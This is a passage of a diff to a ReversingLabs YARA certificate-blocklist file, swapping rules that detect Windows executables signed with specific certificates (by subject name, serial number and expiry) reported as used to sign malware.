 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wei Liu" and pe.signatures [ i ] . serial == "50:f6:6a:b0:d7:ed:19:b6:9d:48:f6:35:e6:95:72:fa" and 1467158400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PILOTE SPRL" and pe.signatures [ i ] . serial == "2a:a0:ae:24:5b:48:7c:89:26:c8:8e:e6:d7:36:d1:ca" and 1612262280 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_11212F502836A784752160351Defb136Cf09 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Aec3D3F752A38617C1D7A677D0B5591 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7609083d-145b-5594-a04b-72c2862873eb"
+		id = "02f2bf36-e573-502c-8ecc-843a6e627c2b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15296-L15312"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "63d4c1aaafdf6de14d0ae78035644cf6b0fefab8b0063d2566ca38af9f9498d2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8300-L8316"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b299833a19944ca6943ba9c974ec95369c57cd61acc8b2e1b5310edd077762c2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19807,21 +44472,21 @@ rule REVERSINGLABS_Cert_Blocklist_11212F502836A784752160351Defb136Cf09 : INFO FI
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures [ i ] . serial == "11:21:2f:50:28:36:a7:84:75:21:60:35:1d:ef:b1:36:cf:09" and 1463726573 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVER d.o.o." and pe.signatures [ i ] . serial == "1a:ec:3d:3f:75:2a:38:61:7c:1d:7a:67:7d:0b:55:91" and 1611705600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2C16Be9A7Ce2A23Ab7A4B4Eb7Da3400C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A7E1Dc5352C3852C5523030F57F2425C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4e17aed7-fd76-549f-bcf7-84c97efc44e4"
+		id = "a2795796-2897-55ad-936c-456c3b93bf14"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15314-L15330"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "917f324cbe91718efc9b2f41ef947fa8f1a501dde319936774d702d57b1e6b37"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8318-L8336"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "79c42c9a4eeeb69a62a16590e2b0b63818785509a40d543c7efe27ec6baaa19e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19831,21 +44496,21 @@ rule REVERSINGLABS_Cert_Blocklist_2C16Be9A7Ce2A23Ab7A4B4Eb7Da3400C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prince city music bar" and pe.signatures [ i ] . serial == "2c:16:be:9a:7c:e2:a2:3a:b7:a4:b4:eb:7d:a3:40:0c" and 1371081600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pushka LLC" and ( pe.signatures [ i ] . serial == "00:a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" or pe.signatures [ i ] . serial == "a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" ) and 1611792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_22Accad235Fb1Ac7422Ebe5Ea7Ac9Bc5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bbd4Dc3768A51Aa2B3059C1Bad569276 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "218543f3-298f-5038-8fa9-3abeda9e4d8f"
+		id = "ee861c79-fea2-5931-873d-b76e5bdef593"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15332-L15348"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b348c502aeae036f6d17283260ed4479427f89c8c25f2b6d59e137e90694dbe4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8338-L8356"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f336570834e0663c6e589fa22b3541f4f79c40ff945dd91f1fd1258a96adeceb"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19855,21 +44520,21 @@ rule REVERSINGLABS_Cert_Blocklist_22Accad235Fb1Ac7422Ebe5Ea7Ac9Bc5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMS INTERACTIVE MEDIA SOLUTIONS" and pe.signatures [ i ] . serial == "22:ac:ca:d2:35:fb:1a:c7:42:2e:be:5e:a7:ac:9b:c5" and 1019001600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JJ ELECTRICAL SERVICES LIMITED" and ( pe.signatures [ i ] . serial == "00:bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" or pe.signatures [ i ] . serial == "bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" ) and 1607472000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4D29757C4Fbfc32B97091D96E3723002 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_08622B9Dd9D78E67678Ecc21E026522E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e1834597-4e45-5866-97f4-e00c79190930"
+		id = "66d942c7-ceb9-54e5-bccc-1adf641fd70e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15350-L15366"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "78ede4b02cb1b07500cd0c4f1f33da598938940d0f58430edda00d79b19b16a5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8358-L8374"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "09507b09b035195b74434f56041588f67245fa097183228dffc612bb4901825b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19879,21 +44544,21 @@ rule REVERSINGLABS_Cert_Blocklist_4D29757C4Fbfc32B97091D96E3723002 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "4d:29:75:7c:4f:bf:c3:2b:97:09:1d:96:e3:72:30:02" and 1474848000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kayak Republic af 2015 APS" and pe.signatures [ i ] . serial == "08:62:2b:9d:d9:d7:8e:67:67:8e:cc:21:e0:26:52:2e" and 1611619200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3A949Ef03D9Dd2D150B24B274Ff6D7B4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E69A6De0074Ece38C2F30F0D4A808456 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6ea47017-1296-5409-8ff2-ef69434233ff"
+		id = "17571f1e-1dce-5216-8f45-467e5d77ccf1"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15368-L15384"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "88c63a921a300e1b985d084c3ab1a2485713b4c674dafd419d092e5562f121d7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8376-L8394"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "21d8641d2394120847044f0e6f4d868095a1e30c0b594a3d045877ab9b3808a1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19903,21 +44568,21 @@ rule REVERSINGLABS_Cert_Blocklist_3A949Ef03D9Dd2D150B24B274Ff6D7B4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "3a:94:9e:f0:3d:9d:d2:d1:50:b2:4b:27:4f:f6:d7:b4" and 1474156800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Semantic" and ( pe.signatures [ i ] . serial == "00:e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56" or pe.signatures [ i ] . serial == "e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56" ) and 1611532800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_954D0577D5Ce8999E0387A5364829F66 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8385684419Ab26A3F2640B1496E1Fe94 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "70e770dd-95fd-5273-b6ee-9bb5eea30e3b"
+		id = "03e861a0-156e-5366-a312-dc2aa73b0393"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15386-L15404"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "84ddc08a0a55200f644778a0e3482f15e82d74c524f12a7ad91b1c3d4acfc731"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8396-L8414"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "24f75badc335160a8053a4c7e8bbd8ddbd3266c3a18059a937d5989df97ae9d9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19927,21 +44592,21 @@ rule REVERSINGLABS_Cert_Blocklist_954D0577D5Ce8999E0387A5364829F66 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Soblosol Limited" and ( pe.signatures [ i ] . serial == "00:95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66" or pe.signatures [ i ] . serial == "95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66" ) and 1543968000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAUSE FOR CHANGE LTD" and ( pe.signatures [ i ] . serial == "00:83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" or pe.signatures [ i ] . serial == "83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" ) and 1612137600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Df5121Dc99D1Ab6B7E5229F6832123Ef : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_21E3Cae5B77C41528658Ada08509C392 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8dfc50be-7316-5a52-937b-4551aa642b7e"
+		id = "fdb1903b-15c1-5cb7-892f-58957303d3b4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15406-L15424"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3b5e5b81890f1dea3dc0858cade54e7f88a21861818be79c3e7fba066f80d491"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8416-L8432"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2e24ed0bd0bf3c36cae4bf106a2c17386bfb58b76372068be9745c2d501f30fc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19951,21 +44616,21 @@ rule REVERSINGLABS_Cert_Blocklist_Df5121Dc99D1Ab6B7E5229F6832123Ef : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "INC SALYUT" and ( pe.signatures [ i ] . serial == "00:df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef" or pe.signatures [ i ] . serial == "df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef" ) and 1613433600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Design International Holdings Limited" and pe.signatures [ i ] . serial == "21:e3:ca:e5:b7:7c:41:52:86:58:ad:a0:85:09:c3:92" and 1609233559 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_760Cef386B63406751Ae83A9Eae92342 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c2cbd1fd-ef68-5128-9c45-88b73a49130f"
+		id = "d6cb1371-113d-5155-aed2-c575321f0973"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15426-L15442"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "43b56736afe081a1215db67b933413d7fbafbfc1be8213b330668578921ebca7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8434-L8450"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2dfc220c44d3dda28a253e5115ae9a087b6ddbf1a7ca1e9bcae5bd9ac5b2e1a0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19975,21 +44640,21 @@ rule REVERSINGLABS_Cert_Blocklist_760Cef386B63406751Ae83A9Eae92342 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gidrokon LLC" and pe.signatures [ i ] . serial == "76:0c:ef:38:6b:63:40:67:51:ae:83:a9:ea:e9:23:42" and 1601942400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BE SOL d.o.o." and pe.signatures [ i ] . serial == "2a:bd:2e:ef:14:d4:80:df:ea:9c:a9:fd:d8:23:cf:03" and 1611100800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5C2625Fa836A64F4882C56Cc7A45F0Ed : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_86909B91F07F9316984D888D1E28Ab76 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "db968865-fb1e-57b5-8968-6510e83c02ac"
+		id = "3cde0016-14d8-5b3a-860e-f5128f899542"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15444-L15460"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "85e187684d62c33ef6f69323b837ef2d44facab8278b512d7bd6afd49eaed976"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8452-L8470"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "abd84492ed008125688a53e20d51780fa0b8c2309dcf751ff76a03d6f337beaa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19999,21 +44664,21 @@ rule REVERSINGLABS_Cert_Blocklist_5C2625Fa836A64F4882C56Cc7A45F0Ed : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "5c:26:25:fa:83:6a:64:f4:88:2c:56:cc:7a:45:f0:ed" and 1474416000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dantherm Intelligent Monitoring A/S" and ( pe.signatures [ i ] . serial == "00:86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" or pe.signatures [ i ] . serial == "86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" ) and 1611273600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Df6Fa580F84493C414Ee0E431086737 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D1B8F1Fe56381Befdb2E73Ffef2A4B28 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "27afa64e-0c9e-58ca-a4e1-db97cde66427"
+		id = "226371ea-670f-52f2-8dfc-78b30a29a5cc"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15462-L15478"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ef244587c9eb1e1cb2f8a9c161e5dd9ff70e9764586f16e011334400ee400ed9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8472-L8490"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c118cb46914e7a6df8dd33dd14d5f9cf2692d98311503ec850cc66f02c20839e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20023,21 +44688,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Df6Fa580F84493C414Ee0E431086737 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "7d:f6:fa:58:0f:84:49:3c:41:4e:e0:e4:31:08:67:37" and 1477440000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sein\\xC3\\xA4joen Squash ja Bowling Oy" and ( pe.signatures [ i ] . serial == "00:d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28" or pe.signatures [ i ] . serial == "d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28" ) and 1617667200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_309D2E115F1Fe2993Ee2E063 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7182f3f2-7b2a-5c29-b7a9-607feafbe570"
+		id = "41b2e05f-1dcd-5ebc-97da-275512deaf72"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15480-L15496"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "15fdb95fe5429cdc0263615c2b7c90d21f37b52954c5ce568c1293cd3a544730"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8492-L8510"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ecc2f6bfda1a0afd016f0a5183c0d1cdfe5d5e06c893a7d9a3d7cb7f9bc4bf16"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20047,21 +44712,21 @@ rule REVERSINGLABS_Cert_Blocklist_309D2E115F1Fe2993Ee2E063 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "30:9d:2e:11:5f:1f:e2:99:3e:e2:e0:63" and 1467102525 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REIGN BROS ApS" and ( pe.signatures [ i ] . serial == "00:d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" or pe.signatures [ i ] . serial == "d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" ) and 1611187200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_90E33C1068F54913315B6Ce9311141B9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_066276Af2F2C7E246D3B1Cab1B4Aa42E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "61c5d5ed-ca2c-5f71-893b-4c933b37fa27"
+		id = "97f791d5-7a73-5da7-984e-32bb94d0e83f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15498-L15516"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4a97171c6dfaa8d249ab0be1ce264b596d266ff4697d869a4d1f90cc0e2c49b7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8512-L8528"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "30d4fa2cbc75d3a6258cdf0374159f25ea152c39784f8b7e9c461978df865dc0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20071,21 +44736,21 @@ rule REVERSINGLABS_Cert_Blocklist_90E33C1068F54913315B6Ce9311141B9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GERMES, OOO" and ( pe.signatures [ i ] . serial == "00:90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9" or pe.signatures [ i ] . serial == "90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9" ) and 1487635200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IQ Trade ApS" and pe.signatures [ i ] . serial == "06:62:76:af:2f:2c:7e:24:6d:3b:1c:ab:1b:4a:a4:2e" and 1616630400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3F15C3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_65Cd323C2483668B90A44A711D2A6B98 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "10bee456-21c0-51a0-988b-43daf65e596b"
+		id = "e2ed910d-2264-58c1-a1a0-3c131020a2cf"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15518-L15534"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "03ea946fa99ed7a6ab23cb26dbf514b6c062d63371c9e2a5ddf999acd1954955"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8530-L8546"
